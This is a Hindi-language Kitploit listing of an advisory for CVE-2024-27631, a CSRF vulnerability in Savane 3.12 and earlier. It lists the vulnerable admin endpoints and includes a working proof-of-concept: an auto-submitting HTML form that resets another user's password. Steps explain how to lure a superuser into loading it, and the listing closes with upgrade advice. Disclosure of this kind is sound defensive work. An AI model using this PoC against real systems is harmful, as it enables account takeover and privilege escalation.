Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-27631 — CVE-2024–27631 संदर्भ | Kitploit
उपकरण/GitHubGitHub/ally-petitt/cve-2024-27631
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubally-petitt/cve-2024-27631

CVE-2024-27631

CVE-2024–27631 संदर्भ

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-27631 भेद्यता विवरण

अवलोकन

Savane v3.12 और उससे पहले के संस्करणों में, प्रशासनिक कार्यों पर CSRF सुरक्षा की कमी के कारण विशेषाधिकार वृद्धि और/या खाता अधिग्रहण हो सकता है। विशेष रूप से, एंडपॉइंट /siteadmin/usergroup.php में अन्य उपयोगकर्ताओं के पासवर्ड और प्रशासनिक फ़्लैग बदलने की कार्यक्षमता शामिल है, जो हमलावर को प्रभावी रूप से स्वयं को व्यवस्थापक बनाने की अनुमति देती है।

CSRF के प्रति संवेदनशील अन्य उल्लेखनीय एंडपॉइंट्स में शामिल हैं:

  • /support/admin/userperms.php - ट्रैकर पर पोस्ट करने की अनुमति देने वाले व्यक्तियों की अनुमतियाँ बदलता है।
  • /project/admin/conf-copy.php - किसी समूह के मौजूदा कॉन्फ़िगरेशन को दूसरे समूह की प्रतिलिपि से ओवरराइट करता है।
  • /project/admin/editgroupnotifications.php - समूह सूचनाएँ संपादित करता है। निजी आइटम सार्वजनिक मेलिंग सूचियों में भेजे जा सकते हैं।
  • /project/admin/useradmin.php - एक समूह से उपयोगकर्ताओं को हटाता है।
  • /news/admin/index.php - समाचार ट्रैकर ईमेल पता संपादित करता है।
  • /people/editjob.php - एक समूह के लिए नौकरी जोड़ता है।

CWE वर्गीकरण: CWE-352: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)

रिपोर्टकर्ता: Ally Petitt

प्रभावित उत्पाद: Savane

प्रभावित संस्करण: 3.12 और उससे पहले के

सत्यापन चरण

यह किसी अन्य उपयोगकर्ता के खाते का पासवर्ड बदलने के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) है, जो खाता अधिग्रहण का एक मार्ग है।

  1. एक पीड़ित उपयोगकर्ता चुनें जिसका पासवर्ड बदला जाना है।
  2. उनके प्रोफ़ाइल पेज (/users/<username>) से उनका userID नोट करें।
  3. निम्नलिखित दुर्भावनापूर्ण वेबपेज बनाएं, user_id को पीड़ित के user ID से और <savane_instance> को उपयुक्त डोमेन नाम/होस्ट पते से बदलें।
root@kitploit:~
<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">

    <input name="form_pw" type="hidden" value="Password1!" />
    <input name="form_pw2" type="hidden" value="Password1!" />
    <input name="user_id" type="hidden" value="<user_id>" />
    <input name="update" type="hidden" value="Update" />
    <input type="submit" value="Submit Request" />
</form>

<script>
document.getElementById("autosubmit").submit();
</script>

  1. दुर्भावनापूर्ण HTML पेज को एक वेबसर्वर पर होस्ट करें और लिंक किसी व्यवस्थापक को भेजें (इसके काम करने के लिए उन्हें सुपरयूज़र मोड में होना चाहिए)।
  2. लिंक पर क्लिक करने के बाद, अत्यंत सुरक्षित पासवर्ड Password1! के साथ पीड़ित खाते में लॉग इन करें।

ध्यान दें कि यह PoC स्क्रिप्ट Firefox v103.0 (64-bit) पर परीक्षण की गई थी।

शमन

Savane संस्करण 3.13 या उच्चतर में अपग्रेड करें। पैच यहाँ पाया जा सकता है।

टूल डाउनलोड करें